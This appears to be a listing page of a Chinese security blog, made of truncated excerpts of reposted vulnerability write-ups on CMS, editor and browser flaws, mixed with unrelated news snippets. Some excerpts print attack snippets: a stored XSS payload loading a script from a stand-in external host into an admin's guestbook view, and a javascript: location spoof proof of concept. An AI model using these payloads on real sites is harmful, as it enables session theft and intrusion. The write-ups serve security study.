1,网上流传的syWebEditor上传漏洞，但是还是利用解析漏洞配合才能奏效，但是大部分情况下，我们发现上传的1.asp;2.gif文件

    By：冰的原点     注：好久没发文了，我看了下这个文档的时间，显示是09年12月的！前些天某牛让我帮看这个防火墙的网站的时候，发现以前的方法其

资料图：赫HTV-2高超音速飞行器想象图 美国号称世界最快飞机（HTV-2）试飞时失去联系：https://lcx.cc/post/1686/

中新社华盛顿8月11日电 (记者 吴庆才) 美国国防部高级研究计划署11日透露，该局研制的“猎鹰”高超音速无人飞机(以下简称HTV-2)11日在升

Author: Noevil Post To: T00ls.Net 发这个纯是为了测试这个东西（NoXss）： http://t00ls.net/viewthread.php?tid=17371 利用方法，在线留言处： 名字填写：   Noevil<SCRIPT SRC="HTTP://xxx/xss.js"></SCRIPT> 内容：随意。 后台管理员查看留言列表，自

本文是从 Why you don't steal from a hacker 这篇文章翻译而来。 本月初，英国发生了严重的暴乱事件，打砸抢烧现象十分的严重，英国警方逮捕了3000多参与暴乱的民众。下

    我操，哥的站很值钱吗？围观一个嗅探哥的孩子。。。     中午的时候发现，服务器Arp防火墙报警“成功拦截来自***的Arp攻击！”，看样子某人在

time:2010-09-11 14:24 author:Luc1f3r blog:http://hi.baidu.com/luc1f3r from:http://hi.baidu.com/luc1f3r%5F/blog/item/265cabcafe57be0d93457e39.html     漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数. inc/function.inc.php： function get_html_url(){  global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;  $id=$aid;  if($page<1){   $page=1;  }  $postdb[posttime]=$rsdb[posttime];    if($showHtml_Type[bencandy][$id]){   $filename_b=$showHtml_Type[bencandy][$id];  }elseif($fidDB[bencandy_html]){   $filename_b=$fidDB[bencandy_html];  }else{   $filename_b=$webdb[bencandy_filename];  }  //对

详细分析下dedecms的这个劫持数据库洞子     漏洞不是我发的，这里仅仅只是分析这个漏洞的成因         今天看到微博看到dedecms出

    众所周知，因使用简单、客户群多，织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息：“DEDECMS爆严重安全漏洞

    2011-06-13 日新闻，中国黑客元老9月推自律公约 欲重拾黑客精神：https://lcx.cc/post/1440/     相见：http://www.cho

    这个是前几天，干某人站，发现用的这套程序，于是就下了一套研究（坑爹啊，04年的Blog程序现在居然还有人用，不过现在这位同学换了Blog程

    By：wooden，From：http://t00ls.net/viewthread.php?tid=17312。 转载请注明出处。&nbs

    By：tojen     Site:www.jooyea.net     Name:iWebIM     测试其他站点的时候遇到这个么东西，下代码看了下，存在文件包含漏洞。     在文件includes.php最后几行： 以下

8月8日，从6晚日开始的伦敦骚乱进入第三天，8日下午和晚间不仅在伦敦诸多地区相继发生暴力事件，而且骚乱已经蔓延至英格兰中部城市伯明翰。伦敦市

    老文章（2010-03-02 22:10），猎奇的东西，转载了……     Windows帮助文件本身存在可以运行任意代码的可能性。winhlp32

    经典老文（2010-02-27 03:05），Good …… 搜狗浏览器版本：1.4.0.418(正式版) 漏洞成因：     在搜狗浏览器中，windo

    何等猎奇的老文章（2009-09-07 16:45），经典，值得学习。。。 代码一：spoof.html <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { location = "http://www.baidu.com"; location = "javascript:alert('xss baidu')"; } </script>     用

    很有意思的一片老文章（2009-07-22 16:40），值得学习……     不要空洞的理论和概念，也不要深奥的行话，除了实战经验，还是实战经验。

    老文章（2009-04-30 19:20），但仍有学习价值，遂转发…… Xss in browser-headers 远程存储     如果把安全的概念推到一个极端，那么一切函数的输出都是有

    老文章（2009-01-19 13:06），但仍有学习价值，遂转发…… 关于53KF:     网上客服（WWW.53KF.COM）是国内领先的网站在

    老文章（2008-12-11 19:11），但仍有学习价值，遂转发……    2008.9.25，我公布"国内邮

    老文章（2008-10-12 16:55），但仍有学习价值，遂转发……     为了让大家对破解有个整体概念，我做了一张破解流程图。大家通过图可以看

    比较老的文章了（2009-01-07 19:46），但是有些技巧还是值得再研究的，所以就转来了，有心学习的人还可以再看看。 一 Myspace介

    比较老的文章了（2009-01-10 02:09），但是有些技巧还是值得再研究的，所以就转来了，有心学习的人还可以再看看。 漏洞描述：      搜狐博

    作者：剑心，是08年剑心发到幻影的pdf文章。 ==Ph4nt0m Security Team== Issue 0x01, Phile #0x06 of 0x06 |=---------------------------------------------------------------------------=| |=-------------=[       利用httponly提升应用程序安全性&nbs

==Ph4nt0m Security Team== Issue 0×03, Phile #0×05 of 0×07 |=—————————————————————————=| |=—————=[ 利用窗口引用漏洞和XSS

    遇到一个比较郁闷的网站，发现了一个download点，可以读取文件。可是啥默认的路径都尝试读取了，没找到网站根目录。想了好几种方式爆路径，

《Make A Contract with IE and Become a XSS Girl!》 这是日本猥琐流代表Yosuke HASEGAWA在hit2011上的议题，当时有幸和朋友hiphop通过